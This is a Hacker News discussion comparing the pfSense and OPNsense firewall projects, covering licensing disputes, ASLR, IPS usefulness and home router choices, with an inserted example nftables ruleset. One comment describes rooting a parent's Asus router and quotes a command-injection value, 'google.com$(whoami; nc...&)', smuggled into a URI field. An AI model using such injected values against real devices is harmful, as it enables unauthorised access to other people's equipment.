PfSense vs OPNsense: technical comparison (firewallhardware.it)
45 points by auslander on June 30, 2018 | 106 comments

As someone with extensive experience and nuance in the FreeBSD community, I will just say that OPNsense and closely affiliated HardenedBSD are basically unintentionally hilarious clown projects. They created some bad blood with particular people but the HBSD side tends to just give me a good belly laugh every handful of months, usually around the larger conference season. Folks from OPN and HBSD appear to have a rudimentary grasp of C while making grandiose security claims. This is probably my favorite feature comparison of all time: https://hardenedbsd.org/content/easy-feature-comparison. It appears to be largely a cult of personality ensnaring users that don't really know any better.

YMMV but for people wanting a firewall you'd be much better off with pfSense, stock OpenBSD, or stock FreeBSD. To get involved in OS work or BSDs you're much better off with Free/Open/Net/TrueOS. Those are communities filled with competent people to support the code and that you can learn from.

> Folks from OPN and HBSD appear to have a rudimentary grasp of C while making grandiose security claims. This is probably my favorite feature comparison of all time https://hardenedbsd.org/content/easy-feature-comparison. It appears to be largely a cult of personality ensnaring users that don't really know any better.

Could you explain what's bad about that comparison? Or point to an example of their "rudimentary grasp of C"?

The comparison is cherry-picked cargo cult. ASLR and a lot of these mitigations were obsolete when HBSD implemented them: https://www.endgame.com/blog/technical-blog/rop-dying-and-yo.... Their ASLR try was rejected by FreeBSD.org. Some of the bullets are completely asinine, like xxx hardening; what does that even mean? The lead developer recently gave a conference talk where, as far as I can tell, he showed that you can root a box as.. root: https://www.youtube.com/watch?v=bT_k06Xg-BE.

Can anyone point to a paper showing where HBSD successfully prevented an attack over FreeBSD?

So they generate a lot of noise. Instead of learning from the larger communities that are filled with extremely talented security people like Colin "cperciva" Percival, Robert Watson, Theo de Raadt, Maxime Villard, etc., Shawn seems hellbent on being an exemplar of the Dunning-Kruger effect. Unfortunately he is towing others along for the ride.

ASLR is obsolete? Why?

Sorry, you didn't bother reading the link so you may consult Google if you are interested.

You started a nasty flamewar with this and got more uncivil downthread. We ban accounts that behave like that, so please don't. Instead, please present your arguments civilly, regardless of how right you are.

Sorry, wasn't the intent. It did appear we were going to make progress in the discussion at points but now is clearly two people with cemented viewpoints.

The link is not about ASLR, but ROP. ROP != ASLR :)

Anyway, even there, we can read: "ASLR aims to prevent an attacker from using previous knowledge of the address space to gain an advantage and execute malicious code. This has proven extremely effective in “raising the bar” of exploitation and is one of the most significant research challenges"

So, back to square one: why is ASLR obsolete? It's one of the main security features.

Recap: OPNsense uses HardenedBSD as its base OS, which has ASLR, along with other BSDs. pfSense uses FreeBSD, which doesn't have ASLR/ASR.

The first sentence in the article should be a bell-ringer: "Too often the defense community makes the mistake of focusing on the what, without truly understanding the why."

These are context-sensitive things that aren't learned by reading a comment thread. If you can't read that article and understand that it shows a multitude of exploits that bypass ASLR, and that almost every exploit and contest includes or relies on an existing ASLR bypass, I don't really know what to tell you other than to keep reading and researching. The answers you seek are linked from TFA.

>The answers you seek

I expect you to back up your statement that ASLR is obsolete. So far all we have is a URL and advice to research ourselves.

What stops you from giving a direct answer? Hint: "ASLR is useless, because I can, for example, do this: ..."

So he can read all memory before exploiting, aha. I give up. You mentioned a language problem? Sure, I can rephrase all I said in simpler terms :)

Please don't react to flamebait by joining a flamewar. We're trying to avoid that here.

No, that's not at all what TFA says lol. You'll fit right in with HBSD and OPN crew :)

Agreed - I will not change from pfSense to OPNsense. Just because you sprinkle Bootstrap on top of pfSense and even remove some functionality does not make it better. My primary concern with OPNsense is however the community behind it, and their tendency to engage in deceptive behavior.

Oh, and note the passive aggressiveness here: https://docs.opnsense.org/fork/thefork.html#so-why-did-we-fo...

Your link got me digging - apparently pfSense has some security issues:

The web server runs as root, and so do all the pages (PHP, etc).

It somehow reminds me of OpenBSD. People complained about their developers being rude, but hey, they cleaned out a lot of junk and are more secure now than FreeBSD.

OpenBSD is not a FreeBSD fork.

I know that it is not. Their common ancestor was BSD 4.3 Reno.

And for pfSense and OPNsense the common ancestor was m0n0wall.

> And for pfSense and OPNsense the common ancestor was m0n0wall.

pfSense forked m0n0wall.

Opnsense forked pfSense.

At some point, everyone forked everyone, but all the code was written by communities under open licenses, so the distinction is entirely political.

Ohhh, really? :)))

Yes, really.

Two forks fighting :)

Perhaps, but the pfSense community has gotten toxic over the past few years, mostly due to the commercial side and the very aggressive stance towards any perceived loss of income.

Projects like pfSense, OpnSense and other GUI-on-top-of-OS systems are only sensible for more end-user applications and community-driven approaches. I switched from pfSense to OpnSense not because of any real difference between the two, but because of the backing community, which is more for the users than it is for me personally; most people using this stuff are in the home or SMB markets and are much better served by a Web UI and a community than by some commercial entity.

Once you go commercial or deep technical, none of the projects make sense, as you are almost always better off going current with a configuration-management-based system (like plain pf on a BSD in combination with something like SaltStack, Ansible, or Chef) or going classic with one of the larger vendors like Cisco and Juniper.

pfSense is shooting itself in the foot by being (petty) d.cks, OpnSense is shooting itself in the foot by (and this is hearsay afaik) technical deficiencies in the primary backing team. On top of that, prosumer vendors are now getting the hang of it and are releasing affordable, supported, yet not too-expensive hardware for most of the setups you'd see those BSD-based WebUIs in. (i.e. UBNT)

I'm predicting that pfSense will try very hard to go full-on commercial, perhaps using the open core model like GitLab does, but probably failing at the commercial side because the advantages (and that goes for OpnSense too) vs. a prosumer/entry-level device from an existing brand are getting smaller and smaller. Most of the advertised stuff (again, goes for both) that you'd get for using open source software isn't really that much of an advantage anyway; most users never report bugs, write patches, inspect the OS, or check checksums. For OpnSense, they are probably going to try not to make a split product, but instead try the vendor network model where you make money by selling support and perhaps pre-configured hardware for people that are stuck between prosumer and home gear needs.

What I personally would like (and I'm still using a mix of pfSense and OpnSense for all GUI-needing systems) is an API-first system, with either no GUI at all, or an optional GUI. Maybe in the direction of VyOS (https://vyos.io/), which is linux based, and currently API-only. This would perhaps have to compete with OpenWRT, but at that point we're getting pretty far away from the capabilities of BSD.

A lot of the setups where there was no budget, or the firewall/router had to be virtual are currently only running pfSense/OPNSense because of a lack of better alternatives, the paid systems are not 'better' by any means, and their past USP was always with the hardware (which at some point became obsolete as well as packet processing in software became fast enough).

For now, I'd suggest anyone who needs a software router/firewall/gateway with a GUI and a reasonable OS to first check OPNSense, as for most uses a healthy community is important. For everyone else, it's probably not really an issue in the case of cloud networking, as they all have API-driven (and a GUI to drive the API) firewalling which covers almost all SMB use cases. So far I've only seen three cases where the box-with-a-firewall-and-GUI approach still matters: home, SMB, on-prem with no investment in skill. As soon as you have the skill and infrastructure to go without a GUI, none of the sense/wrt and prosumer systems matter, and as soon as you go beyond the 'need to buy stuff because we don't know or want to do it' stage you get into MSP/Cloud territory.

Editing (mostly for my own update regarding what's out there) for some extra projects:

There seems to be a number of 'other' projects in various states of integration, support and maintenance:

1. https://bsdrp.net which looks like a much more 'embedded' CLI router, has configuration abstraction

2. https://securityrouter.org which uses open everything except the nice backend which does paid upgrades for features

3. Floodlight Controller has a REST API for configuration, which does mostly firewalling and switching, not really a gateway or something like that, lives mostly in the SDN realm, mostly found on Linux systems instead of BSD, but it's a model that comes closer and closer to the model you get on providers like AWS. CloudFirewall is an (older) example of letting one device do the packet and frame forwarding, but some other service do the rules and control of one or more of those devices (be it hardware or software devices).

> What I personally would like (and I'm still using a mix of pfSense and OpnSense for all GUI-needing systems) is an API-first system, with either no GUI at all, or an optional GUI.

Yup. Have you looked at TNSR?

It’s what we’re doing (in addition to pfSense).

Docs: https://www.netgate.com/docs/tnsr/

API (be sure to hit Nav -> Modules)

As for your prediction that we will take pfSense “full on commercial”,...

Well, frankly, you’re wrong.

Well, frankly, your software has:

1. a big banner with angry text about commercial and trademark stuff

2. a widget about Netgate selling you stuff

3. A Netgate Device ID so you can track pfSense and no way to remove that

Basically, pfSense is Netgate's b!tch, and almost none of the FOSS community spirit is left.

You don't see this with other projects, it's clearly a direction chosen by Netgate and the paid people. It's about money, and about being commercial. The community forum is a commercial outlet, and anything that might even come close to not giving netgate sales is censored.

About TNSR, it does look like a neat set of features for the much more integrated cloud world and SDN setups, but there is no easy-to-find information about the state of licensing, cost, sources etc. It's very easy to buy this stuff already; the only interesting thing for most members of our implementors forum is having a FOSS solution with paid support and perhaps enterprise extras to buy like Elastic's X-Pack. Even if TNSR were to come out on top in terms of features and compatibility with existing infrastructures, it wouldn't have any space to operate in, at least not in the current markets we are servicing (which is pretty much Eurasia except China and Russia, plus Brazil and Canada).

I understand all of your points. I also understand the business of a company like Netgate. Their primary condition is that you don't take their work, modify it, and still call it pfSense. That's not any different from Red Hat or Canonical (who might not need a banner because they have a fleet of legal staff that quietly handles "compliance"). On the human side this is a product that they put a lot of work into and is also the livelihood of the main contributors, so yes, they do deserve to be compensated with their products and services offerings, and trademark is a reasonable tool to enforce so people know they are dealing with the real product they support and said main contributors. Projects owned by a company also have almost no governance infighting nor analysis paralysis issues; there are trade-offs to everything.

They are giving you the software for free under permissive licenses. If you want to take it, remove the ID, and make money using their exact business model, you can do that if you call it something else. That is exactly what OPNSense is. Being permissively licensed it's generous to the point that you can take the code, turn it into a proprietary product, and make a fortune without ever communicating or doing anything for the parent. By respecting the trademark they aren't asking for much at all.

Well, it's not really about any of that. It's the same stuff they have been saying, but what it is actually about is trying to say 'we are a neat community FOSS project' on one side, while actually being a generic commercial vendor that happens to have an open OS due to legacy reasons. In the 1.2.3 and early 2.0 days, it was all fine; before that it was mostly 'just monowall' and after that it was 'let's try to work full time on this stuff and make money'.

There is no reason to be assholes, as other projects work fine using the same free open core + paid enterprise version; this is something Netgate-specific, probably due to the hardware business where you have physical things that lose value unless you unload them quickly.

Now, don't get me wrong here, I'm not saying commercial business of trying to sell hardware/software is inherently bad, but being pissy because someone else does it too is just weak.

Netgate didn’t build pfsense from scratch, it’s a fork of monowall which is in turn basically just a GUI on top of the networking stack that ships with FreeBSD.

Netgate deserve some credit for their effort, but not so much that we should turn a blind eye when they get bitchy and malicious about the use of open source code.

I’ve said for a long time now that the whole AES hardware requirement would prove to be little more than a red herring to dampen open hardware sales; it’s pretty hard to argue otherwise now.

Vote quietly and without insinuating shillage, please.

A nice rule in the abstract.

Thanks a lot for that, I was curious why I haven't heard of OPNsense before.

Have you heard of the other stuff? Most people probably know OpenWRT or DD-WRT by name (from the home wifi-router combo devices). Or did you roll into the 'real' stuff so early on that you never actually had to look for pre-existing implementations to base a project on?

What other stuff? I heard about pfSense, OpenBSD's PF, iptables. I'm actually a sysadmin, just choosing a beefy integrated router/firewall/whatever_fancy for my home x86/2core w. AES-NI/4GB RAM box to replace Sophos UTM; I suspect it is phoning home too much :)

Ah, then I misunderstood you ;-) I've seen users replace Sophos UTM with other solutions quite often now, it seems to have too much 'invisible' parts and suspicious system connections to the world (as far as I've heard -- not used it myself). I'd say try OpnSense (and perhaps pfSense). They are the 'best' replacements for Sophos UTM free as far as I know.

> be much better off with pfSense, stock OpenBSD, or stock FreeBSD

There is a reason why people install pfSense and not stock BSD; it's called a GUI :)

And pfSense was playing with licences before, some think it's getting ready to do it again.

> And pfSense was playing with licences before, some think it's getting ready to do it again.

FUD much? 'some' might think, but I know, and we're not.

Reddit folks are worried, for example: https://www.reddit.com/r/PFSENSE/comments/7398pa/absolutely_...

Btw, OPNsense is using the BSD 2-Clause "Simplified" license. The "permissive", non-copyleft one, same as FreeBSD uses, not pfSense's Apache 2.0.

"It is a fork of pfSense, which in turn was forked from m0n0wall, which was built on FreeBSD. It was launched in January 2015. When m0n0wall closed down in February 2015 its creator, Manuel Kasper, referred its developer community to OPNsense" [0]

I just heard of OPNsense today. Also, there [0] is a thing about pfSense hoarding OPNsense's domain ...

[0] https://en.wikipedia.org/wiki/OPNsense

I have been doing security work for a very long time, since before the projects underpinning pfSense were a thing (I don't mean Snort, which I predate, but pf itself; I was working in network security when we were all being thrilled by Darren Reed's work on ipfilter).

I say this not to brag (it would be a terrible brag, like playing up my Turbo C++ bona fides) but as context for a question:

What are people doing with these things?

When is it making sense for people to be deploying what appears for all the world to be the Kali Linux of Defensive Network Security? I'd be confused to hear about a client deploying Suricata at all --- but Suricata on a dedicated firewall box with a PHP interface? What problem is this solving?

Among the top 10 questions startups ask us when we talk to them about what we do is, "we got this self-assessment questionnaire from a big client and it asks what our IPS is, what IPS should we use?" And we laugh and say "these SAQs were written in the 1990s and lovingly handed down from generation to generation of network security engineers and nobody actually expects you to install an IPS because doing that in a 2018 production environment would be silly, just tell them you only expose ports 80 and 443". And that answer always works. How are people finding a different answer? I'm genuinely asking.

I use pfSense. I do not use the IPS features mostly because of the reasons you present. However pfSense is also a very capable router, which is why I use it.

Are there other ways to solve this problem? Of course; most problems in tech have a large number of solutions, each with their own trade-offs. If I were to set my network up again, I would probably go with an EdgeRouter Pro or similar, but since I already had a low power server I could repurpose as the router, it was $0 vs $400.

That makes sense. If that's why most people use these things --- to repurpose old hardware in their basement rather than ordering a new router --- then pfSense makes some sense to me.

Doesn't have to be just re-purposing old hardware for it to make sense IMHO.

I started using pfSense on old hardware to get rid of Verizon's router, however I plan to replace it with a brand new box that will likely be $250-500.

I have gigabit FiOS coming into the ONT outside, and from there I get an Ethernet port that comes straight to the pfSense box. No Verizon router present at all.

Besides pfSense, what other open source options do I have to run a firewall that can handle gigabit Ethernet with VPN? DD-WRT? Tomato?

Sure, I can setup a Debian box with iptables in my sleep, but pfSense is much nicer.

I’m in a similar boat (ATT fiber) and really curious as well. I’ve considered pfSense with a dual gigabit NIC but honestly I’d rather have a dedicated box that can handle the routing and firewall features.

OpenWRT is standard for routers, you can even run it on x86 just fine, and unlike PFSense it won't shit a brick and sit in a broken state at console just because a secondary ethernet interface disappears.

PFSense really is targeted at the prosumer market. If you're happy to haul a screen out on every upgrade or minor hardware change, PFSense is fine. Otherwise, going OpenWRT is a solid choice as you can actually debug it remotely.

Nice, first post and all I get is downvotes. Screw this place!

I once tried out pfSense, about 8 years ago. I was looking for a VPN solution for a small startup. I had used pf on OpenBSD, and really liked it as a firewall, so having "pf" in the name made pfSense sound good to me. My hope was that pfSense would provide an easy out-of-the-box VPN setup, without me having to configure a RADIUS server to talk to LDAP, and have easy user provisioning.

What I found was a mess of PHP and poor quality plugins. The init scripts were written in PHP, and the plugins modified the init scripts. So plugins could, and did, break the init process, preventing the firewall rules from loading.

I don't think people are using pfSense in production environments, I see this class of solution being used by IT at small companies. Think about big corporate networks, where you might have a device from Palo Alto Networks, or a Cisco ASA for a remote access VPN. Then imagine you are at a 20 person company, a decade ago before SaaS really took off, and you think you need a VPN, but can't afford something from a big company, and don't want to glue together a bunch of open source tools. I think that is when people reach for pfSense.

I don't think it makes much sense these days. Small companies can use much dumber (and better) gateway devices. With SaaS and things like Google IAP and Cloudflare Access there is little need for VPNs. As for IPS, I have trouble imagining IPS being needed or even working at a small company. Big companies can have sophisticated detection systems and teams to deal with them. Hopefully big companies were never using pfSense.

>What I found was a mess of PHP and poor quality plugins. The init scripts were written in PHP, and the plugins modified the init scripts. So plugins could, and did, break the init process, preventing the firewall rules from loading.

Really, really not my experience, and I've been using it for ~7 years.

>I don't think people are using pfSense in production environments

I was running 1% of all internet traffic through a dual pair of pfSense firewalls running on some HP 2U servers during Christmas 2011 (the interface was slow as shit with that load though, to be honest).

I wouldn't discount its power. Mostly when you buy something like a Juniper SRX it's similar underneath. It's not like there are common ASICs for firewalls.

You need to use pfSense now.

It's come a long way since you did.

People are using pfSense in production too.

(though I have my quibbles with NetGate, who owns pfSense).

> Suricata on a dedicated firewall box with a PHP interface? What problem is this solving?

The same as every other feature bullet: checking off a box so the product doesn't get "out-checked". Only this time it involves tinkerers, who might set the thing up because it sounds cool, before really asking why. Presumably the package was already in some repo, and it tickled someone's fancy to do the little bit of integration work. But that doesn't mean these types of packages are driving the adoption of pfSense. That said, I don't really need MRTG graphs, but if I can get them by clicking a few boxes, I just might.

As other people have said, the main driver is (NAT) routers. Soon in need of a faster router, I'm personally considering trying out the pfSense route rather than straightforward (for me) Debian+iptables. Both for a bit of kernel diversity, and sometimes it's nice to just click away.

> Especially since I'd have to park it behind my ISP's prem box, which is the thing that is actually going to get owned up on my home network.

Your ISP's equipment is not part of your home network; you're better off viewing its Ethernet port as the service demarc. In fact, given the straightforward business interest in, say, enumerating the devices on your home network, I'd characterize it as a persistent attacker. Protocol-wise, there's little drawback to just lumping it with the ISP's overtly hostile DPI gear. About the only trust I'm willing to grant that thing is that it's unable to draw untoward amounts of power, say mining crypto coins, and if it's already fed by fibre that it won't create its own electrical surges.

If you read this site you are probably well above the target audience in terms of skill. By numbers, I'd guess small/mid size business IT personnel dwarf the higher end multi-tier {dev,eng,ops,sre,sec} of tech companies. And these IT folks generally need a push-button appliance experience due to education/skills. Think Microsoft products, and control panels and wizards on Linux like cPanel.

If you go walk the floor of a commercial data center, you will see tons of sonicwall, Ubiquiti, etc. Basically these are an open source version of those.

Now a subset of these projects might have some serious implementation smells, but I wouldn't really pass judgement on the users of any of those things. Just about any business can benefit from technology, not everything is well suited for services/hosted approaches, and there is clearly a need for simplified IT equipment.

Sure, I get that, but my point isn't that I would do what pfSense/OPNSense does in a better, more elegant way; it's that I wouldn't do them at all. Isn't that even easier than installing one of these thingies?

Say you have a single static IP at a small office and need to set up a network of systems behind a NAT with DHCP, and maybe a few PAT forwarding rules to a server. It would basically take the time to burn a USB stick and boot it, and 30 minutes of following the UI prompts for even low skilled folks. What would you recommend said folks do instead?

Isn't that a problem almost every wifi router that costs more than $150 already solves? I might just not be understanding your requirements. Also: you just described a problem that requires something like 2% of all the crud OPNSense brags about running.

I’ve been using pfSense for about 5 years. For the past 10+ years I’ve been on either 1x1Gbps or 2x1Gbps symmetric up/down links via fiber (no ISP boxes); no consumer/semipro router in the $150-400 range has been able to keep up with these links (tried a few at different times), and especially not handling IPSec tunneling at these speeds. So I use my old Nehalem/Supermicro server (8c/24GB RAM, multiple Intel Pro NICs). I used to run FreeBSD+pf, then NetBSD+npf manually configured, but around 2013 my hard drive broke in a move so I just threw pfSense onto an old disk I had lying around as a temporary solution to get up and running quickly. At that point I never had time/got around to actually setting up npf again, so I just kept running pfSense and still am.

This server cost me about $100 since I salvaged most parts from a broken server I bought from some company back in 08. It's been running really solid, and I tried to replace it with high-end prosumer routers a few times when I was upgrading my Wi-Fi but they never kept up. I’m now using a UniFi AC PRO for Wi-Fi since my last TP-Link router/AP broke.

> every wifi router that costs more than $150

Price does not matter. Botnets are created on consumer grade routers, of any price range: Asus, Netgear and the like. None of them are x86 based, and most run outdated BusyBox Linux on low power SoC chips.

Botnets are created on internet of things devices and printers, rarely on routers. A small business trying to set up and administer a Unix server as a router is more likely to go wrong than buying a dedicated appliance.

My point is I don't trust consumer grade stuff.

> Unix server as a router is more likely to go wrong

That is exactly why you install pfSense/OPNsense.

I’ve actually trivially rooted my mother's Asus two times when she had network problems and I had to find a way of debugging it remotely. One time I could inject an RCE via some kind of network connection testing tool they had which was supposed to take a URI but happily accepted something like "google.com$(whoami; nc...&)"

I don't know why people use it either.

I looked pretty seriously at using it when I was considering building an outgoing firewall product, where people could share blocklists for IoT devices and things like smart TVs.

It's pretty well suited for building things like that on top of.

Maybe people are building things like site blockers for schools on top of it?

Maybe it's just a hobbyist/prosumer play?

> I don't know why people use it either.

I'm shocked this is a common statement on this.

Because it's great. It's a fast firewall and router. It's perfect for not overpaying for something like a Cisco ASA.

But in what circumstances? How big is your business?

If you are running a SME office, then there are plenty of decent firewall appliances which are much cheaper than Cisco ASA, and have much lower support overhead than Sense.

If people are doing it for fun or as a hobby, great. But given that you can get perfectly good appliances at $500/$1000/$2000 price points, where is the price tradeoff where it makes sense to use Sense?

The thread is too deep to reply direct, but you appear to be more or less agreeing. There are low powered x86 systems at that price point. pfSense has offered a software upgrade path for over a decade, and takes security advisories seriously, so how many store bought routers can boast anything close to that? pfSense also scales up to 10gbit forwarding performance. I can't really comment on the cruft, AFAIK you don't need to run an IDS and that is all in packages.

One case where I would use pfSense. Let's say you are a system admin of a small private school, and you get an alert email from Comcast saying that copyrighted content was downloaded using torrents. You deploy pfSense and with 30 clicks you have Snort configured and set to block torrent connections.

Can you please comment on why installing an IPS in a production environment in 2018 is silly? (genuinely want to know)

Also, when or where would you recommend installing an IPS product? As part of a corporate firewall?

I would more or less never recommend installing an IPS. In the past dozen or so years I've spent lots of time (months at a time) working on the networks of F500s that have fleets of IPS systems, alongside their security teams, and I have never once seen an IPS do anything but generate alerts that get bucketed in a SEM and forgotten about.

I completely agree, but think this shows a failing of "blue team" culture and education. I just started work on a massive project with half a dozen companies sharing massive AWS VPCs. They have limited security team oversight and coordination. Wouldn't it be nice if they had sufficient levels of access to Snort/Suricata data and could learn what normal operations look like and educate themselves to look for poorly documented systems that are not hooked up to the SIEM or even the APM correctly, or are failing to talk to different EC2 instances correctly, and help? Inventory and ops aren't sexy and aren't security, but countless times I see younger SOC kids who know absolutely nothing about what their environment looks like. That data would not help them even if they were allowed out of the kiddie sandbox and not only allowed to read baked queries and alerts.

The reason this stuff is useless is because I have never met someone with sufficient experience to act on it for any context, because people think the tools magically bring educated, talented people.

I've used pfSense several times to have a (semi-)pro grade router/firewall at an entry level price. For me it strikes a nice balance between power and ease of configuration. Even though personally I don't care too much about most advanced features, I like how there are no arbitrary limitations, and it's good to know that the underlying technology is solid and inspectable/tweakable if needed. And yes, I do buy new hardware for it without hesitation; the PC Engines APU is very well-suited. This way $200 can get you a better solution than $600–$800 off-the-shelf.

Maybe we're doing it wrong, but we use IPS for the same reasons that we use signature-based antivirus: as a backstop. Ideally, they wouldn't do anything, but we live and work in a less-than-ideal world with imperfect information security policies (and configurations), mobile users and visitors and students, and IT staff who aren't all infosec pros like you. And in that less-than-ideal world, both intrusion prevention systems and antivirus software mitigate enough risk to make their procurement, deployment, management, monitoring, and maintenance worth my while.

Here[0] is a series of videos showing what a small IT company does with pfsense.

[0]: https://www.youtube.com/user/TheTecknowledge/search?query=pf...

Huge number of answers, but I'll give mine. At work I would use a Ubiquiti or Untangle or Mikrotik or something, but for home use yeah, for less than the cost of one of those that will do gigabit you can get an old server (small), put pfSense on it, and have something far more flexible than an Asus or Netgear. For instance: try setting port 80 only coming IN from a certain IP with one of those? Not even sure you can do that on a Ubiquiti. Try to find something that can do that AND do UPnP so your kid can play Black Ops 3...

pfSense does provide a free GUI interface to OpenVPN. That's useful in many small business applications. Also, don't discount that you can't buy one at BestBuy; that lends (for non-technical peeps) a veneer of credibility.

> What are people doing with these things?

With Suricata, or with pfSense?

Suricata is used when you want to block internal clients that do something suspicious (like join a botnet), or to notice something unwanted (like using a banned application, such as dropbox).

> but Suricata on a dedicated firewall box with a PHP interface? What problem is this solving?

Ease of use without overpaying for the same feature set. I'm surprised you think there isn't a problem it's solving, to be honest.

> What are people doing with these things?

Home routers?

PfSense is very popular in the SMB market where there is little to no IT staff or budget but requirements beyond what can be satisfied with a home router.

PfSense is also popular as a firewall appliance in cloud deployments. Demand for running pfSense was one of the drivers for Microsoft to add FreeBSD support to Azure.

If you need a GUI, just use something like Halon's SecurityRouter.

Is it free to use? Is it open source?

Depends / it's source available AFAIK.

Some time ago I looked at this sort of thing (simple management + status GUI for a router), and pfSense & friends are just huge, bloated pieces of mess that I really don't want on critical infra. SecurityRouter OTOH came across as one of the very few frontends actually designed for security (see their docs). (Also it doesn't include the full B/S suite.)

In the end I didn't choose any GUI and just put a Debian on a box. I don't really know any of the BSDs and it certainly wasn't worth more of my time to fool around with a small piece of infra that's going to be ignored >99.99 % of the time.

> it's source available AFAIK

AFAIK it is not.

Halon pivoted away from this market. Last I looked it was a secure email play.

Wasn't SR always a side project for them? Still gets releases, though.

Why do I want my home router to be really good at detecting Windows Server attacks from 2013? Especially since I'd have to park it behind my ISP's prem box, which is the thing that is actually going to get owned up on my home network.

Not sure what your problem is, honestly. Custom home router on a small form factor machine to replace buggy Netgears. Just put your ISP's box in bridge mode.

That didn't address either of my questions/concerns.

For someone claiming to be an expert, you appear to be completely ignorant about the products you're judging.

What does "detecting a windows server attack from 2013" have to do with ANYTHING? The primary purpose of the OPNSense and PFSense projects is to be a better home router replacement. Now PFSense has "moved up" if you will into the SMB space, and has further ambitions in the routing space, but the basics still come down to that goal.

Suricata and Snort aren't even installed by default, much less required. So why do you keep harping on that functionality? It's irrelevant. These are ROUTERS that can be extended to do IPS if you so choose, but is in no way required.

Is the page we're commenting on just a really bad description of the project? Because it does not say that OPNSense is simply a ROUTER, and besides "we switched to the fastest PHP framework"† the IPS capabilities are basically the only technical comparison the article makes.

OPNSense describes itself as a firewall. A firewall is generally something you deploy along with a router. Does the term "firewall" just mean something else among the community of people repurposing old Dell towers to build complicated home networks?

Blame the industry? Every home router you can buy today is a "firewall" by their definition, because it does NAT and blocks all inbound traffic by default. I think it's silly to debate whether or not that's a fair description, but they're using the terminology their target market is used to hearing.

Some vendors have moved towards calling their SPI functionality the "firewall" portion, but that debate is about a decade too late.

I want to monitor and/or optionally block outgoing traffic. How do I do that with my AirPort Extreme? Which router should I get? One network administrator type friend recommended pfSense on a Netgate device. Is that bad advice?

I don't think so at all (not bad advice that is). I run PFSense and am happy with it. Things like QoS tend to be difficult to get working right, but just straight blocking isn't a big deal.

I'm not sure you need to do the netgate device unless you want support, you can use literally any x86-64 box you have lying around. Another good option if you're looking for an "all encompassing" solution would be ubiquiti. If you went that route you'd likely want to dump the airport extreme though and just go all-in on ubiquiti.

It's a page to describe what they do differently than PfSense, and that happens to be a) the web frontend and b) the choice of IDS/IPS. There is little reason to describe the "boring" standard stuff that's routing, firewalling, VPN server role that's the core of both projects. Have a look at the comparison table at the bottom for a better idea of the feature sets.

> A firewall is generally something you deploy along with a router. Does the term "firewall" just mean something else among the community of people repurposing old Dell towers to build complicated home networks?

That's an unfair characterization IMHO. In the commercial market, there are tons of "firewall appliances" that are used as router/firewall combinations: Sophos UTM, Watchguard boxes, Fortigate, ...

pfSense and OPNsense play in roughly the same space: a box you plug your WAN interface into that will do (primarily static) routing, firewalling with multiple zones, and act as a VPN server. And typically have some amount of security checkboxes a la IDS, WAF, ..., although the commercial ones with the opportunity to sell subscriptions emphasize this more.

I'm no fan of php, but you realize the home routers you recommended earlier typically have CGI UIs written in _C_ by people that don't really understand strings and pointers?

Why does the linked article prominently feature suricata if it's irrelevant?

Also, the word ROUTER doesn't even appear on the linked page.

Because it is talking about what they do differently from PfSense, and thus are not covering the basic router/firewall/VPN server functionality both have had forever. The table at the bottom gives a bit better impression of what they are about.

My biggest issue with pfSense is the company that runs it: Netgate. It's putting it mildly to say they are jerks.

I was banned from their forum for saying I wouldn't pay for Gold if they were going to sunset a range of CPUs when their explanation of why was less than clear. I then apologized for offending them, and they said it's a life ban so too bad.

Just read their forum or the reddit. Look for Ivor comments specifically.

I'm running OPNSense for a small private school and it seems to be working fine. I looked at pfSense but between the licensing changes, petty infighting, and "not so pretty" GUI I chose not to use it.

One of the things that OPNSense has over pfSense is the ease-of-use factor. This firewall/router will be used in a school, by non-technical people, it needs to be pretty and easy to make simple changes to. Things like blacklisting/whitelisting a site, and adding a static IP for a printer, are activities that are commonly done by a teacher or administrator. If it's hard to do then I get a call and that's no good for me. :)

I did some performance testing comparing pfSense and OPNsense on identical hardware and out-of-the-box configuration. On my Atom 1.6 GHz dual Intel NIC router I was able to get near line-speed gigabit NAT from pfSense, while OPNsense maxed out around 825 Mbps. I spent only a couple of hours with the test, and quickly decided switching off pfSense wasn't worth it for me.

I am currently running pfSense, but am handrolling a firewall with Ansible and nftables. I highly recommend it over something like pfSense or OPNsense; I found the GUI in pfSense wasn't flexible enough.
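As an added illustration of the kind of ruleset such a handrolled nftables firewall would carry (this is not the commenter's ruleset), here is one that covers the cases raised elsewhere in this thread: default-deny inbound, NAT for the LAN, port 80 reachable from only one external address, and logging/blocking of selected outbound traffic. Interface names, the 192.168.1.0/24 LAN, the 203.0.113.10 admin address and the 192.168.1.20 web server are constructed placeholders.

```nft
#!/usr/sbin/nft -f
# Example ruleset (not from the thread); interface names and addresses are placeholders.
flush ruleset

define WAN = "eth0"
define LAN = "eth1"
define LAN_NET = 192.168.1.0/24
define WEB_ADMIN = 203.0.113.10    # the single external address allowed to reach port 80
define WEB_SERVER = 192.168.1.20   # internal host the port-80 traffic is forwarded to

table inet filter {
    chain input {
        type filter hook input priority 0; policy drop;
        ct state established,related accept
        ct state invalid drop
        iif lo accept
        # LAN hosts may talk to the router itself (DNS, DHCP, management UI)
        iifname $LAN accept
        # rate-limited ping from the outside, everything else inbound is dropped by policy
        iifname $WAN icmp type echo-request limit rate 5/second accept
    }
    chain forward {
        type filter hook forward priority 0; policy drop;
        ct state established,related accept
        ct state invalid drop
        # "port 80 only coming in from a certain IP": DNAT (below) has already
        # rewritten the destination, so match the internal server address here
        iifname $WAN ip saddr $WEB_ADMIN ip daddr $WEB_SERVER tcp dport 80 ct state new accept
        # outbound control: block direct SMTP from the LAN and log it
        iifname $LAN oifname $WAN tcp dport 25 log prefix "blocked-smtp: " drop
        # log each new outbound flow (rate-limited so logging cannot be flooded), then allow it
        iifname $LAN oifname $WAN ct state new limit rate 10/second log prefix "lan-out: "
        iifname $LAN oifname $WAN accept
    }
    chain output {
        type filter hook output priority 0; policy accept;
    }
}

table ip nat {
    chain prerouting {
        type nat hook prerouting priority -100; policy accept;
        iifname $WAN ip saddr $WEB_ADMIN tcp dport 80 dnat to $WEB_SERVER
    }
    chain postrouting {
        type nat hook postrouting priority 100; policy accept;
        oifname $WAN ip saddr $LAN_NET masquerade
    }
}
```

Load it with `nft -f` and check the counters with `nft list ruleset`; the logged `lan-out:` lines are what give the visibility into outgoing traffic that another commenter asked about.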

I replaced all my bad phrasing with a pointer back to the commenter who referenced pfSense and others as clown projects. So true. Bye.

Reading about the recent developments putting an FPGA in front of a NIC, it seems to me that would be a really neat way to build a firewall.

Firewall and routing have been done with FPGA for many many years. Have a look at enterprise and carrier grade hardware.

I had a hard time reading this. The flow and phrasing is quite bad. Read 1/2 way and quit.

Summary, kind of. I replaced my Sophos UTM with OPNsense. So far so good.

